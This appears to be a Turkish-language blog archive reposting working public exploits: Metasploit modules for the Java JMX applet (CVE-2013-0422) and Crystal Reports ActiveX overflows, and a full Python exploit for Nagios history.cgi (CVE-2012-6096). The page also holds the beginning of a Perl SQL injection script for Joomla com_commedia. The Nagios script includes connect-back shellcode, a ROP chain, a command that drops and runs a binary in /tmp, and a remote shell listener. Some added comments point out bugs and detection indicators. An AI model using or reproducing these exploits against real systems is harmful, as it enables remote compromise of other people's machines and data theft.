Archive for Remote Exploits

Java Applet JMX Remote Code Execution

Java Applet JMX uzaktan kod çalıştırma açığı bulundu. Açık Metasploit tarafından bulunmuş olup, açığa ilişkin exploit aşağıdadır.


##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core' require 'rex'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::EXE

  include Msf::Exploit::Remote::BrowserAutopwn
  # Registered with BrowserAutopwn as an applet-based (non-JavaScript) module.
  autopwn_info({ :javascript => false })

  # Module metadata. Four targets are declared: a Java payload (the default)
  # and native x86 payloads for win, osx and linux.
  def initialize( info = {} )
    super( update_info( info,
      'Name'          => 'Java Applet JMX Remote Code Execution',
      'Description'   => %q{      This module abuses the JMX classes from a Java Applet to run arbitrary Java     code outside of the sandbox as exploited in the wild in January of 2013. The     vulnerability affects Java version 7u10 and earlier.    },
      'License'       => MSF_LICENSE,
      'Author'        =>
        [
          'Unknown', # Vulnerability discovery
          'egypt', # Metasploit module
          'sinn3r', # Metasploit module
          'juan vazquez' # Metasploit module
        ],
      'References'    =>
        [
          [ 'CVE', '2013-0422' ],
          [ 'US-CERT-VU', '625617' ],
          [ 'URL', 'http://malware.dontneedcoffee.com/2013/01/0-day-17u10-spotted-in-while-disable.html' ],
          [ 'URL', 'http://labs.alienvault.com/labs/index.php/2013/new-year-new-java-zeroday/' ],
          [ 'URL', 'http://pastebin.com/cUG2ayjh' ]  #Who authored the code on pastebin?  I can't read Russian 🙁
        ],
      'Platform'      => [ 'java', 'win', 'osx', 'linux' ],
      'Payload'       => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
      'Targets'       =>
        [
          [ 'Generic (Java Payload)',
            {
              'Platform' => ['java'],
              'Arch' => ARCH_JAVA,
            }
          ],
          [ 'Windows x86 (Native Payload)',
            {
              'Platform' => 'win',
              'Arch' => ARCH_X86,
            }
          ],
          [ 'Mac OS X x86 (Native Payload)',
            {
              'Platform' => 'osx',
              'Arch' => ARCH_X86,
            }
          ],
          [ 'Linux x86 (Native Payload)',
            {
              'Platform' => 'linux',
              'Arch' => ARCH_X86,
            }
          ],
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Jan 10 2013'
    ))
  end

  # Reads the two precompiled class files shipped under
  # data/exploits/cve-2013-0422 and replaces the string "Exploit" in the
  # exploit class with a random alpha string of the same length (presumably
  # so the class-file string lengths stay valid). B.class is kept as is.
  def setup
    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-0422", "Exploit.class")
    @exploit_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-0422", "B.class")
    @loader_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }

    @exploit_class_name = rand_text_alpha("Exploit".length)
    @exploit_class.gsub!("Exploit", @exploit_class_name)
    super
  end

  # HTTP handler. A URI ending in .jar gets the payload JAR with both class
  # files added and the "metasploit"/"Payload" strings in entry names and
  # data randomised; a URI ending in "/" gets the applet page; anything
  # else is redirected to the resource root. Every request is logged.
  def on_request_uri(cli, request)
    print_status("handling request for #{request.uri}")

    case request.uri
    when /\.jar$/i
      jar = payload.encoded_jar
      # NOTE(review): the <a href="mailto:..."> wrapper around the file name
      # below looks like a rendering artifact of the page this was copied
      # from rather than module source; the visible anchor text is the
      # intended class file name.
      jar.add_file("<a href="mailto:#{@exploit_class_name}.class">#{@exploit_class_name}.class</a>", @exploit_class)
      jar.add_file("B.class", @loader_class)
      metasploit_str = rand_text_alpha("metasploit".length)
      payload_str = rand_text_alpha("payload".length)
      # Same-length replacements, so entry sizes do not change.
      jar.entries.each { |entry|
        entry.name.gsub!("metasploit", metasploit_str)
        entry.name.gsub!("Payload", payload_str)
        entry.data = entry.data.gsub("metasploit", metasploit_str)
        entry.data = entry.data.gsub("Payload", payload_str)
      }
      jar.build_manifest

      send_response(cli, jar, { 'Content-Type' => "application/octet-stream" })
    when /\/$/
      # Local `payload` shadows the payload method for the rest of this branch.
      payload = regenerate_payload(cli)
      if not payload
        print_error("Failed to generate the payload.")
        send_not_found(cli)
        return
      end
      send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })
    else
      send_redirect(cli, get_resource() + '/', '')
    end

  end

  # Builds the applet page: a 1x1 applet whose archive is a random 8-letter
  # .jar and whose code attribute names the renamed exploit class. Those two
  # attributes are the observable markers in the served HTML.
  def generate_html
    html  = %Q|<html><head><title>Download</title></head>|
    html += %Q|<body><center><p>Loading, Please Wait...</p></center>|
    # NOTE(review): the <a href="mailto:..."> wrapper here is the same
    # page-rendering artifact seen in on_request_uri.
    html += %Q|<applet archive="#{rand_text_alpha(8)}.jar" code="<a href="mailto:#{@exploit_class_name}.class">#{@exploit_class_name}.class</a>" width="1" height="1">|
    html += %Q|</applet></body></html>|
    return html
  end

end

Nagios history.cgi Remote Command Execution Vulnerability

nagios-history

Nagios history.cgi Remote Command Execution Açığı Bulundu. Açık için aşağıdaki python exploit yazılmış olup, uzaktan (remote) back connect yapılarak servere ulaşım imkanı mevcut. Açık bulucunun açığın kullanımı hakkındaki yazmış olduğu python exploit aşağıdaki gibidir.

#!/usr/bin/python

#

# CVE-2012-6096 - Nagios history.cgi Remote Command Execution

# ===========================================================

# Another year, another reincarnation of classic and trivial

# bugs to exploit. This time we attack Nagios.. or more

# specifically, one of its CGI scripts. [1]

#

# The Nagios code is an amazing monster. It reminds me a

# lot of some of my early experiments in C, back when I

# still had no clue what I was doing. (Ok, fair enough,

# I still don't, heheh.)

#

# Ok, I'll come clean. This exploit doesn't exactly

# defeat FORTIFY. This approach is likely to work just FINE

# on other crippled distro's though, think of stuff like

# ArchLinux, Slackware, and all those Gentoo kids twiddling

# their CFLAGS. [2] (Oh and hey, BSD and stuff!)

#

# I do some very stupid shit(tm) here that might make an

# exploit coder or two cringe. My sincere apologies for that.

#

# Cold beer goes out to my friends who are still practicing

# this dying but interesting type of art:

#

#   * brainsmoke * masc * iZsh * skier_ * steve *

#

# -- blasty <blasty@fail0verflow.com> / 2013-01-08

#

# References:

# [1] http://permalink.gmane.org/gmane.comp.security.oss.general/9109

# [2] http://www.funroll-loops.info/

#

# P.S. To the clown who rebranded my Samba exploit: j00 s0 1337 m4n!

# Next time you rebrand an exploit at least show some diligence and

# add some additional targets or improvements, so we can all profit!

#

# P.P.S. hey, Im not _burning_ bugs .. this is a 2day, enjoy!

#

import os, sys, socket, struct, urllib, threading, SocketServer, time

from base64 import b64encode

# Let the connect-back listener rebind its port immediately after a restart.
SocketServer.TCPServer.allow_reuse_address = True

# Target table. A single build is shipped; every value is a fixed address or
# length for that specific i386 package, so any other build needs its own
# entry (no runtime address discovery is done anywhere in this script).
targets = [
    {
        "name"       : "Debian (nagios3_3.0.6-4~lenny2_i386.deb)",
        "smash_len"  : 0xc37,        # length of the 'host' value before the return chain
        "unescape"   : 0x0804b620,   # cgi_input_unescape() address in this build
        "popret"     : 0x08048fe4,   # pop/ret gadget address
        "hostbuf"    : 0x080727a0,   # static buffer holding the 'host' value
        "system_plt" : 0x08048c7c    # system@plt in this build
    }
]

def u32h(v):
    """Pack v as a little-endian 32-bit unsigned int and return it hex-encoded (Python 2 str API)."""
    return struct.pack("<L", v).encode('hex')

def u32(v, hex = False):
    """Pack v as a little-endian 32-bit unsigned int. The `hex` flag is accepted but never read."""
    return struct.pack("<L", v)

# Tiny ELF stub based on:
# http://www.muppetlabs.com/~breadbox/software/tiny/teensy.html
def make_elf(sc):
    """Wrap raw code in a minimal 32-bit ELF image.

    The header is a fixed 0x54-byte stub; the two size fields are set to
    0x54 + len(sc) so the whole file is mapped. Returns header + sc as bytes.
    """
    elf_head = \
        "7f454c46010101000000000000000000" + \
        "02000300010000005480040834000000" + \
        "00000000000000003400200001000000" + \
        "00000000010000000000000000800408" + \
        "00800408" + u32h(0x54+len(sc))*2  + \
        "0500000000100000"

    return elf_head.decode("hex") + sc

# interactive connectback listener
class connectback_shell(SocketServer.BaseRequestHandler):
    # Relays bytes between the local terminal (fd 0 / fd 1) and the connected
    # socket. The terminal is put into cbreak mode for the duration and
    # restored in the finally block, also on Ctrl-C.
    def handle(self):
        print "\n[!!] K4P0W!@# -> shell from %s" % self.client_address[0]
        print "[**] This shell is powered by insane amounts of illegal substances"
        s = self.request
        import termios, tty, select, os
        old_settings = termios.tcgetattr(0)
        try:
            tty.setcbreak(0)
            c = True
            # Two commands are sent automatically on every connection; from the
            # host side they are the first thing visible in the session.
            os.write(s.fileno(), "id\nuname -a\n")
            # Zero select timeout: this is a busy-poll loop. The loop ends when a
            # read returns an empty string (EOF on either side).
            while c:
                for i in select.select([0, s.fileno()], [], [], 0)[0]:
                    c = os.read(i, 1024)
                    if c:
                        if i == 0:
                            os.write(1, c)   # echo local input
                        os.write(s.fileno() if i == 0 else 1, c)
        except KeyboardInterrupt: pass
        finally: termios.tcsetattr(0, termios.TCSADRAIN, old_settings)
        return

class ThreadedTCPServer(SocketServer.ThreadingMixIn, SocketServer.TCPServer):
    """TCP server that handles each incoming connection on its own thread."""
    pass

# ---- command line ----------------------------------------------------------
# NOTE(review): the usage text names only <base_uri>, but the script reads
# four positional arguments: argv[1] base URI, argv[2] listener host,
# argv[3] listener port, argv[4] target index (see the uses below).
if len(sys.argv) != 5:
    print "\n  >> Nagios 3.x CGI remote code execution by <blasty@fail0verflow.com>"
    print "  >> \"Jetzt geht's Nagi-los!\"\n"
    print "  usage: %s <base_uri>   \n" % (sys.argv[0])
    print "  targets:"
    i = 0
    for target in targets:
        print " %02d) %s" % (i, target['name'])
        i = i+1
    print ""
    sys.exit(-1)

target_no = int(sys.argv[4])
# NOTE(review): the upper bound is off by one (> rather than >=); a value
# equal to len(targets) passes this check and raises IndexError just below.
if target_no < 0 or target_no > len(targets):
    print "Invalid target specified"
    sys.exit(-1)

target = targets[ int(sys.argv[4]) ]

# comment this shit if you want to setup your own listener
# The listener runs on a daemon thread so the main thread can go on to send
# the request and then sleep before shutting the server down.
server = ThreadedTCPServer((sys.argv[2], int(sys.argv[3])), connectback_shell)
server_thread = threading.Thread(target=server.serve_forever)
server_thread.daemon = True
server_thread.start()

# shellcode to be executed
# vanilla x86/linux connectback written by a dutch gentleman
# close to a decade ago.
# Hex-encoded. The "badc0ded" and "b0ef" substrings are placeholders that are
# patched with the listener address and port right after.
cback = \
    "31c031db31c951b10651b10151b10251" + \
    "89e1b301b066cd8089c231c031c95151" + \
    "68badc0ded6668b0efb102665189e7b3" + \
    "1053575289e1b303b066cd8031c939c1" + \
    "740631c0b001cd8031c0b03f89d3cd80" + \
    "31c0b03f89d3b101cd8031c0b03f89d3" + \
    "b102cd8031c031d250686e2f7368682f" + \
    "2f626989e3505389e1b00bcd8031c0b0" + \
    "01cd80"

cback = cback.replace("badc0ded", socket.inet_aton(sys.argv[2]).encode("hex"))
cback = cback.replace("b0ef", struct.pack(">H", int(sys.argv[3])).encode("hex"))

# Eww.. so there's some characters that dont survive the trip..
# yes, even with the unescape() call in our return-chain..
# initially I was going to use some /dev/tcp based connectback..
# but /dev/tcp isn't available/accesible everywhere, so instead
# we drop an ELF into /tmp and execute that. The '>' characters
# also doesn't survive the trip so we work around this by using
# the tee(1) utility.
# If your target has a /tmp that is mounted with noexec flag,
# is severely firewalled or guarded by trained (watch)dogs..
# you might want to reconsider this approach!
# Host-side artifacts of this stage: a file /tmp/x written through tee(1)
# and then executed, and a CGI query value carrying a "base64 -d" pipeline.
cmd  = \
    "rm -rf /tmp/x;" + \
    "echo " + b64encode(make_elf(cback.decode('hex'))) + "|" + \
    "base64 -d|tee /tmp/x|chmod +x /tmp/x;/tmp/x;"

# Spaces (0x20) are also a problem, they always ends up as '+' 🙁
# so apply some olde trick and rely on $IFS for argv separation
# "${IFS}" inside a CGI parameter value is a good thing to alert on in web logs.
cmd = cmd.replace(" ", "${IFS}")

# Basic return-2-whatever/ROP chain.
# We return into cgi_input_unescape() to get rid of
# URL escaping in a static buffer we control, and then
# we return into system@plt for the moneyshot.
#
# Ergo sum:
# There's no memoryleak or whatever needed to leak libc
# base and bypass ASLR.. This entire Nagios PoS is stringed
# together by system() calls, so pretty much every single one
# of their little silly binaries comes with a PLT entry for
# system(), huzzah!
rop = [
    u32(target['unescape']),
    u32(target['popret']),
    u32(target['hostbuf']),
    u32(target['system_plt']),
    u32(0xdeafbabe),        # presumably a throw-away return address for the system() frame
    u32(target['hostbuf'])
]

# Yes.. urllib, so it supports HTTPS, basic-auth and whatnot
# out of the box. Building HTTP requests from scratch is so 90ies..
# The 'host' value is padded with 'A' up to smash_len before the chain, so the
# request carries a 'host' parameter of well over 0xc37 bytes on
# /cgi-bin/history.cgi - an easy size anomaly to flag.
params = urllib.urlencode({
    'host' : cmd + "A"*(target['smash_len']-len(cmd)) + "".join(rop)
})

print "[>>] CL1Q .."
f = urllib.urlopen(sys.argv[1]+"/cgi-bin/history.cgi?%s" % params)
print "[>>] CL4Q .."
f.read()

# TRIAL PERIOD ACTIVE, LOL!
# 0x666 == 1638 seconds: keeps the listener thread alive before shutdown.
time.sleep(0x666)
server.shutdown()

Internet Explorer 8 Fixed Col Span ID full ASLR & DEP bypass

Internet Explorer 8 versiyonunda tehlikeli bir açık bulundu.
Exploiti açmaya antivirüsler izin vermediğinden exploit eklenmemiştir.
Açığın tanıtımı şu şekildedir.

 
<!-- 
** Exploit Title: Internet Explorer 8 Fixed Col Span ID full ASLR & DEP bypass 
** Author: sickness@offsec.com 
** Thanks to Ryujin and Dookie for their help. 

#################################################################### 

** Affected Software: Internet Explorer 8 

** Vulnerability: Fixed Col Span ID 

** CVE: CVE-2012-1876 

** Metasploit exploit using NON-ASLR DLL: http://dev.metasploit.com/redmine/projects/framework/repository/entry/modules/exploits/windows/browser/ms12_037_ie_colspan.rb 

** Vupen Blog post: http://www.vupen.com/blog/20120710.Advanced_Exploitation_of_Internet_Explorer_HeapOv_CVE-2012-1876.php 

** Tested on Windows 7 (x86) - IE 8.0.7601.17514 
#################################################################### 

** The exploit bypasses ASLR without the need of any NON-ASLR dll's using a leak 🙂  

** To get it working on a different version of Windows you will need to make your own changes to the exploit 🙂  
** Have fun 🙂 
--> 

Crystal Reports CrystalPrintControl ActiveX ServerResourceVersion Property Overflow

Crystal Reports CrystalPrintControl ActiveX ServerResourceVersion Property Overflow exploit.


##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = NormalRanking

	include Msf::Exploit::Remote::HttpServer::HTML
	include Msf::Exploit::RopDb
	include Msf::Exploit::Remote::BrowserAutopwn

	# BrowserAutopwn metadata: IE 6-8 on Windows, keyed on the control's CLSID
	# and the ServerResourceVersion property.
	autopwn_info({
		:ua_name    => HttpClients::IE,
		:ua_minver  => "6.0",
		:ua_maxver  => "8.0",
		:javascript => true,
		:os_name    => OperatingSystems::WINDOWS,
		:rank       => NormalRanking,
		:classid    => "{88DD90B6-C770-4CFF-B7A4-3AFD16BB8824}",
		:method     => "ServerResourceVersion"
	})


	# Module metadata. Targets without 'Rop' (IE 6/7 on XP) get the raw payload;
	# the IE 8 targets use the msvcr71.dll (jre) ROP chain with a stack pivot.
	def initialize(info={})
		super(update_info(info,
			'Name'           => "Crystal Reports CrystalPrintControl ActiveX ServerResourceVersion Property Overflow",
			'Description'    => %q{
					This module exploits a heap based buffer overflow in the CrystalPrintControl
				ActiveX, while handling the ServerResourceVersion property. The affected control
				can be found in the PrintControl.dll component as included with Crystal Reports
				2008. This module has been tested successfully on IE 6, 7 and 8 on Windows XP SP3
				and IE 8 on Windows 7 SP1. The module uses the msvcr71.dll library, loaded by the
				affected ActiveX control, to bypass DEP and ASLR.
			},
			'License'        => MSF_LICENSE,
			'Author'         =>
				[
					'Dmitriy Pletnev', # Vulnerability discovery
					'Dr_IDE', # PoC
					'juan vazquez' # Metasploit
				],
			'References'     =>
				[
					[ 'CVE', '2010-2590' ],
					[ 'OSVDB', '69917' ],
					[ 'BID', '45387' ],
					[ 'EDB', '15733' ]
				],
			'Payload'        =>
				{
					'Space' => 890,
					'BadChars' => "\x00",
					'DisableNops' => true,
					'PrependEncoder' => "\x81\xc4\xa4\xf3\xfe\xff" # Stack adjustment # add esp, -500
				},
			'DefaultOptions'  =>
				{
					'InitialAutoRunScript' => 'migrate -f'
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					# Using jre rop because msvcr71.dll is installed with the ActiveX control
					# Crystal Reports 2008 / PrintControl.dll 12.0.0.683
					[ 'Automatic', {} ],
					[ 'IE 6 on Windows XP SP3',
						{
							'Rop' => nil,
							'Offset' => '0x5F4',
							'Ret' => 0x0c0c0c08
						}
					],
					[ 'IE 7 on Windows XP SP3',
						{
							'Rop' => nil,
							'Offset' => '0x5F4',
							'Ret' => 0x0c0c0c08
						}
					],
					[ 'IE 8 on Windows XP SP3',
						{
							'Rop' => :jre,
							'Offset' => '0x5f4',
							'Ret' => 0x0c0c0c0c,
							'Pivot' => 0x7c342643 # xchg eax, esp # pop edi # add byte ptr [eax],al # pop ecx # ret
						}
					],
					[ 'IE 8 on Windows 7',
						{
							'Rop' => :jre,
							'Offset' => '0x5f4',
							'Ret' => 0x0c0c0c0c,
							'Pivot' => 0x7c342643 # xchg eax, esp # pop edi # add byte ptr [eax],al # pop ecx # ret
						}
					]
				],
			'Privileged'     => false,
			'DisclosureDate' => "Dec 14 2010",
			'DefaultTarget'  => 0))

		# OBFUSCATE runs the generated JavaScript through JSObfu (see ie_heap_spray).
		register_options(
			[
				OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])
			], self.class)

	end

	# Picks a concrete target from the User-Agent when the configured target is
	# 'Automatic'. Returns the matching target, or nil when none matches.
	def get_target(agent)
		#If the user is already specified by the user, we'll just use that
		return target if target.name != 'Automatic'

		nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || ''
		ie = agent.scan(/MSIE (\d)/).flatten[0] || ''

		ie_name = "IE #{ie}"

		# NOTE(review): os_name stays nil for any other NT version string; with a
		# non-empty nt, t.name.include?(os_name) below then raises TypeError
		# instead of falling through to the nil return.
		case nt
		when '5.1'
			os_name = 'Windows XP SP3'
		when '6.0'
			os_name = 'Windows Vista'
		when '6.1'
			os_name = 'Windows 7'
		end

		targets.each do |t|
			if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))
				print_status("Target selected as: #{t.name}")
				return t
			end
		end

		return nil
	end

	# Returns the heapLib-based spray JavaScript for payload p, optionally
	# obfuscated with JSObfu when OBFUSCATE is set.
	# NOTE(review): the endianness lookups here use the module-level `target`
	# while the offset comes from the `my_target` parameter; load_exploit_html
	# uses my_target.arch for the same purpose. Presumably equivalent, but
	# inconsistent.
	def ie_heap_spray(my_target, p)
		js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(target.arch))
		js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(target.arch))

		# Land the payload at 0x0c0c0c0c
		# For IE 6, 7, 8
		js = %Q|
		var heap_obj = new heapLib.ie(0x20000);
		var code = unescape("#{js_code}");
		var nops = unescape("#{js_nops}");
		while (nops.length < 0x80000) nops += nops;
		var offset = nops.substring(0, #{my_target['Offset']});
		var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);
		while (shellcode.length < 0x40000) shellcode += shellcode;
		var block = shellcode.substring(0, (0x80000-6)/2);
		heap_obj.gc();
		for (var i=1; i < 0x300; i++) {
			heap_obj.alloc(block);
		}
		var overflow = nops.substring(0, 10);
		|

		js = heaplib(js, {:noobfu => true})

		if datastore['OBFUSCATE']
			js = ::Rex::Exploitation::JSObfu.new(js)
			js.obfuscate
		end

		return js
	end

	# Returns the encoded payload; for targets that define 'Rop' it is prefixed
	# with the RopDb 'java' (msvcr71.dll) chain using the target's pivot gadget.
	# `cli` is accepted but not used.
	def get_payload(t, cli)
		code = payload.encoded

		# No rop. Just return the payload.
		return code if t['Rop'].nil?

		# Both ROP chains generated by mona.py - See corelan.be
		print_status("Using JRE ROP")
		rop_payload = generate_rop_payload('java', code, {'pivot' => [t['Pivot']].pack("V")})

		return rop_payload
	end

	# Builds the full exploit page for my_target (spray script plus the fifteen
	# CrystalPrintControl objects and the overflow trigger). `cli` is not used.
	# Served-page indicators: fifteen <object> tags sharing the
	# 88DD90B6-C770-4CFF-B7A4-3AFD16BB8824 CLSID, a long unescape()d string
	# assigned to ServerResourceVersion, and a BinName read on the next object.
	def load_exploit_html(my_target, cli)
		p  = get_payload(my_target, cli)
		js = ie_heap_spray(my_target, p)

		# This rop chain can't contain NULL bytes, because of this RopDB isn't used
		# rop chain generated with mona.py
		rop_gadgets =
			[
				0x7c37653d, # POP EAX # POP EDI # POP ESI # POP EBX # POP EBP # RETN
				0xfffffdff,	# Value to negate, will become 0x00000201 (dwSize)
				0x7c347f98,	# RETN (ROP NOP) [msvcr71.dll]
				0x7c3415a2,	# JMP [EAX] [msvcr71.dll]
				0xffffffff,	#
				0x7c376402,	# skip 4 bytes [msvcr71.dll]
				0x7c351e05,	# NEG EAX # RETN [msvcr71.dll]
				0x7c345255,	# INC EBX # FPATAN # RETN [msvcr71.dll]
				0x7c352174,	# ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN [msvcr71.dll]
				0x7c344f87,	# POP EDX # RETN [msvcr71.dll]
				0xffffffc0,	# Value to negate, will become 0x00000040
				0x7c351eb1,	# NEG EDX # RETN [msvcr71.dll]
				0x7c34d201,	# POP ECX # RETN [msvcr71.dll]
				0x7c38b001,	# &Writable location [msvcr71.dll]
				0x7c347f97,	# POP EAX # RETN [msvcr71.dll]
				0x7c37a151,	# ptr to &VirtualProtect() - 0x0EF [IAT msvcr71.dll]
				0x7c378c81,	# PUSHAD # ADD AL,0EF # RETN [msvcr71.dll]
				0x7c345c30,	# ptr to 'push esp #  ret ' [msvcr71.dll]
			].pack("V*")

		# Allow to easily stackpivot to the payload
		# stored on the sprayed heap
		stackpivot_to_spray = %Q|
			mov esp, 0x0c0c0c10
			ret
		|

		# Space => 0x940 bytes
		# 0x40c: Fill the current CrystalPrintControl object
		# 0x8: Overflow next heap chunk header
		# 0x52c: Overflow next CrystalPrintControl object until the ServerResourceVersion offset
		bof = rand_text_alpha(1036)
		bof << [0x01010101].pack("V") # next heap chunk header
		bof << [0x01010101].pack("V") # next heap chunk header
		bof << [my_target.ret].pack("V")
		bof << [0x7c3410c4].pack("V") # ret # msvcr71
		bof << [0x7c3410c4].pack("V") # ret # msvcr71
		bof << [0x7c3410c4].pack("V") # ret # msvcr71
		bof << [0x7c3410c4].pack("V") # ret # msvcr71
		bof << [0x7c3410c4].pack("V") # ret # msvcr71
		bof << [0x7c3410c4].pack("V") # ret # msvcr71
		bof << [0x7c3410c4].pack("V") # ret # msvcr71
		bof << [0x7c3410c4].pack("V") # ret # msvcr71 # eip for w7 sp0 / ie8
		bof << rop_gadgets
		bof << Metasm::Shellcode.assemble(Metasm::Ia32.new, stackpivot_to_spray).encode_string
		bof << rand_text_alpha(0x940 - bof.length)

		js_bof = Rex::Text.to_unescape(bof, Rex::Arch.endian(my_target.arch))

		# NOTE(review): the local `target` assigned here shadows the module's
		# `target` method for the rest of this method; only my_target is used
		# below, so behaviour is unaffected, but the name is misleading.
		target = rand_text_alpha(5 + rand(3))
		target2 = rand_text_alpha(5 + rand(3))
		target3 = rand_text_alpha(5 + rand(3))
		target4 = rand_text_alpha(5 + rand(3))
		target5 = rand_text_alpha(5 + rand(3))
		target6 = rand_text_alpha(5 + rand(3))
		target7 = rand_text_alpha(5 + rand(3))
		target8 = rand_text_alpha(5 + rand(3))
		target9 = rand_text_alpha(5 + rand(3))
		target10 = rand_text_alpha(5 + rand(3))
		target11 = rand_text_alpha(5 + rand(3))
		target12 = rand_text_alpha(5 + rand(3))
		target13 = rand_text_alpha(5 + rand(3))
		target14 = rand_text_alpha(5 + rand(3))
		target15 = rand_text_alpha(5 + rand(3))

		# - 15 CrystalPrintControl objects are used to defragement the heap.
		# - The 10th CrystalPrintControl is overflowed.
		# - After the overflow, trying to access the overflowed object, control
		# can be obtained.
		html = %Q|
		<html>
		<head>
		<script>
		#{js}
		</script>
		</head>
		<body>
		<object id='#{target}' classid='clsid:88DD90B6-C770-4CFF-B7A4-3AFD16BB8824'></object>
		<object id='#{target2}' classid='clsid:88DD90B6-C770-4CFF-B7A4-3AFD16BB8824'></object>
		<object id='#{target3}' classid='clsid:88DD90B6-C770-4CFF-B7A4-3AFD16BB8824'></object>
		<object id='#{target4}' classid='clsid:88DD90B6-C770-4CFF-B7A4-3AFD16BB8824'></object>
		<object id='#{target5}' classid='clsid:88DD90B6-C770-4CFF-B7A4-3AFD16BB8824'></object>
		<object id='#{target6}' classid='clsid:88DD90B6-C770-4CFF-B7A4-3AFD16BB8824'></object>
		<object id='#{target7}' classid='clsid:88DD90B6-C770-4CFF-B7A4-3AFD16BB8824'></object>
		<object id='#{target8}' classid='clsid:88DD90B6-C770-4CFF-B7A4-3AFD16BB8824'></object>
		<object id='#{target9}' classid='clsid:88DD90B6-C770-4CFF-B7A4-3AFD16BB8824'></object>
		<object id='#{target10}' classid='clsid:88DD90B6-C770-4CFF-B7A4-3AFD16BB8824'></object>
		<object id='#{target11}' classid='clsid:88DD90B6-C770-4CFF-B7A4-3AFD16BB8824'></object>
		<object id='#{target12}' classid='clsid:88DD90B6-C770-4CFF-B7A4-3AFD16BB8824'></object>
		<object id='#{target13}' classid='clsid:88DD90B6-C770-4CFF-B7A4-3AFD16BB8824'></object>
		<object id='#{target14}' classid='clsid:88DD90B6-C770-4CFF-B7A4-3AFD16BB8824'></object>
		<object id='#{target15}' classid='clsid:88DD90B6-C770-4CFF-B7A4-3AFD16BB8824'></object>
		<script>
		var ret = unescape('#{js_bof}');
		#{target9}.ServerResourceVersion = ret;
		var c = #{target10}.BinName.length;
		</script>
		</body>
		</html>
		|

		return html
	end

	# HTTP handler: resolves the target from the User-Agent, answers 404 when
	# no target matches, otherwise serves the exploit page as text/html.
	def on_request_uri(cli, request)
		agent = request.headers['User-Agent']
		uri   = request.uri
		print_status("Requesting: #{uri}")

		my_target = get_target(agent)
		# Avoid the attack if no suitable target found
		if my_target.nil?
			print_error("Browser not supported, sending 404: #{agent}")
			send_not_found(cli)
			return
		end

		html = load_exploit_html(my_target, cli)
		# Strip the two-tab indentation carried over from the %Q literals.
		html = html.gsub(/^\t\t/, '')
		print_status("Sending HTML...")
		send_response(cli, html, {'Content-Type'=>'text/html'})
	end

end

Joomla commedia Remote Exploit

Joomla commedia eklentisinde SQL injection açığı bulunmuş olup, Joomla commedia Remote Perl Exploit ve açık hakkındaki açıklamalar şu şekildedir.

 Exploit Title: Joomla commedia Remote Exploit

 dork: inurl:index.php?option=com_commedia
 
 Date: [18-10-2012]
 
 Author: Daniel Barragan "D4NB4R"
 
 Twitter: @D4NB4R
  
 Vendor: http://www.ecolora.org/
 
 Version: 3.1 (last update on Oct 7, 2012) and lowers
 
 License: Commercial and Non-Commercial, affects 2 versions

 Demo: http://www.ecolora.org/index.php/demo/commedia

 Download: http://ecolora.com/index.php/programmy/file/5-plagin-mp3browser-dlya-muzykalnykh-satov-na-joomla-15
  
 Tested on: [Linux(bt5)-Windows(7ultimate)]

 Especial greetz:  Pilot, _84kur10_, nav, dedalo, devboot, ksha, shine, p0fk, the_s41nt


Descripcion: 

Commedia - a component and content plugin that allows you to create a content table containing all of the MP3's that are present in any directory of your site, a FTP-server (folder, single path to ftp-file) or a HTTP(S)-server (DROPBOX, folder, single path to http-file or http-radio).
 

Exploit: 

#!/usr/bin/perl -w
    ########################################
    # Joomla Component (commedia) Remote SQL Exploit
    #----------------------------------------------------------------------------#
    ########################################
    print "\t\t\n\n";
print "\t\n";
print "\t            Daniel Barragan  D4NB4R                \n";
print "\t                                                   \n";
print "\t      Joomla com_commedia Remote Sql Exploit \n";
print "\t\n\n";
print "                   :::Opciones de prefijo tabla users:::\n\n";
print "    1.  jos_users  2.  jml_users  3.  muc_users  4.  sgj_users  \n\n\n";

# `use` is resolved at compile time, so placing it after the banner is fine.
# LWP::Simple is loaded but not used by any of the subs on this page.
use LWP::UserAgent;
use HTTP::Request;
use LWP::Simple;

# Menu: the number selects which users-table prefix sub to run. $option is
# not chomped; the numeric == comparison tolerates the trailing newline. Any
# other input matches nothing and the script simply ends.
print ":::Opcion::: ";
my $option=<STDIN>;
if ($option==1){&jos_users}
if ($option==2){&jml_users}
if ($option==3){&muc_users}
if ($option==4){&sgj_users}


sub jos_users {

# Prompts for the site base URL and runs the union-based query against the
# "jos_users" table. The other three subs on this page differ only in $table.
print "\nIngrese el Sitio:[http://wwww.site.com/path/]: ";


chomp(my $target=<STDIN>);

    # $user/$pass are column names selected from the users table, not
    # credentials supplied by the operator.
    #the username of  joomla
    $user="username";
    #the pasword of  joomla
    $pass="password";
    #the tables of joomla
    $table="jos_users";
    $d4n="com_commedia&format";
    $parametro="down&pid=59&id";
    
    # Note: $b is also Perl's sort() comparator variable; harmless here since
    # nothing sorts, but an unusual choice of name.
    $b = LWP::UserAgent->new() or die "Could not initialize browser\n";
    $b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
    # The hex constants decode to "<user>", "<user><pass>" and "<pass>"; they
    # bracket the returned values so the regexes below can find them. In web
    # logs the request to look for is option=com_commedia with "union all
    # select" and these hex markers in the id= parameter.
